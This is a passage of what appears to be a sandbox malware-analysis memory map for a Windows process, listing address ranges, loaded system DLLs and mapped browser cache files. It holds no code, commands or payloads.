entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 357 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 358 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 359 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 360 start_va = 0x749f0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749f1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 361 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 362 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 363 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 364 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 365 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 366 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 367 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 368 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 369 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 370 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 371 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 372 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 373 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 374 start_va = 0x749b0000 end_va = 0x749e1fff monitored = 0 entry_point = 0x749b37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 375 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 376 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 377 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 378 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 379 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 380 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 381 start_va = 0x800000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 382 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 383 start_va = 0x540000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 384 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 385 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 386 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 387 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 388 start_va = 0x800000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 389 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 390 start_va = 0x9e0000 end_va = 0x1ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 391 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 392 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 393 start_va = 0x1de0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 394 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 395 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 396 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 397 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 398 start_va = 0x1f40000 end_va = 0x220efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 399 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 400 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 401 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 402 start_va = 0x250000 end_va = 0x257fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 403 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 404 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 405 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 406 start_va = 0x1de0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 407 start_va = 0x1f00000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 408 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 409 start_va = 0x73930000 end_va = 0x73981fff monitored = 0 entry_point = 0x739314be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 410 start_va = 0x739d0000 end_va = 0x739e4fff monitored = 0 entry_point = 0x739d12de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 411 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 412 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 413 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 414 start_va = 0x2c0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 415 start_va = 0x300000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 416 start_va = 0x2210000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 417 start_va = 0x2310000 end_va = 0x240ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 418 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 419 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 420 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 421 start_va = 0x990000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 422 start_va = 0x2410000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 423 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 424 start_va = 0x2510000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 425 start_va = 0x2550000 end_va = 0x264ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 426 start_va = 0x74a10000 end_va = 0x74a26fff monitored = 0 entry_point = 0x74a11c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 427 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 428 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 429 start_va = 0x74970000 end_va = 0x749aefff monitored = 0 entry_point = 0x74972351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 430 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 431 start_va = 0x2650000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 432 start_va = 0x2650000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 433 start_va = 0x27b0000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 434 start_va = 0x27c0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 435 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 436 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 437 start_va = 0x27c0000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 438 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 439 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 440 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 441 start_va = 0x350000 end_va = 0x357fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 442 start_va = 0x2650000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 443 start_va = 0x2730000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 444 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 445 start_va = 0x28c0000 end_va = 0x2a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 446 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 447 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 448 start_va = 0x73990000 end_va = 0x739c7fff monitored = 0 entry_point = 0x7399990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 449 start_va = 0x28c0000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 450 start_va = 0x2a20000 end_va = 0x2a5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 451 start_va = 0x2690000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 452 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 453 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 454 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 455 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 456 start_va = 0x74960000 end_va = 0x74967fff monitored = 0 entry_point = 0x749634d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 457 start_va = 0x3e0000 end_va = 0x3e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 458 start_va = 0x74950000 end_va = 0x74957fff monitored = 0 entry_point = 0x749510e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 459 start_va = 0x71ea0000 end_va = 0x71ed7fff monitored = 0 entry_point = 0x71ea1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 460 start_va = 0x74930000 end_va = 0x74946fff monitored = 0 entry_point = 0x749335fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 461 start_va = 0x71e60000 end_va = 0x71e9cfff monitored = 0 entry_point = 0x71e610f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 462 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 463 start_va = 0x26d0000 end_va = 0x270bfff monitored = 0 entry_point = 0x26d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 464 start_va = 0x26d0000 end_va = 0x270bfff monitored = 0 entry_point = 0x26d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 465 start_va = 0x26d0000 end_va = 0x270bfff monitored = 0 entry_point = 0x26d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 466 start_va = 0x26d0000 end_va = 0x270bfff monitored = 0 entry_point = 0x26d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 467 start_va = 0x26d0000 end_va = 0x270bfff monitored = 0 entry_point = 0x26d128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 468 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 469 start_va = 0x2b60000 end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 470 start_va = 0x71e40000 end_va = 0x71e55fff monitored = 0 entry_point = 0x71e42061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 842 start_va = 0x3e0000 end_va = 0x3e9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 843 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 844 start_va = 0x2c60000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 894 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 895 start_va = 0x28c0000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 896 start_va = 0x29a0000 end_va = 0x29dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 897 start_va = 0x2e60000 end_va = 0x2f3efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e60000" filename = "" Region: id = 898 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 899 start_va = 0x754c0000 end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 900 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 901 start_va = 0x71dc0000 end_va = 0x71e3cfff monitored = 0 entry_point = 0x71dc166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 902 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 903 start_va = 0x6f0000 end_va = 0x6f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 904 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 905 start_va = 0x6f0000 end_va = 0x6f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 906 start_va = 0x737b0000 end_va = 0x737defff monitored = 0 entry_point = 0x737b1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 907 start_va = 0x26d0000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 908 start_va = 0x2f40000 end_va = 0x303ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 909 start_va = 0x72a20000 end_va = 0x72b14fff monitored = 0 entry_point = 0x72a30d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 910 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 911 start_va = 0x3f0000 end_va = 0x3f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 912 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 913 start_va = 0x6f0000 end_va = 0x6f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 914 start_va = 0x2740000 end_va = 0x2765fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = 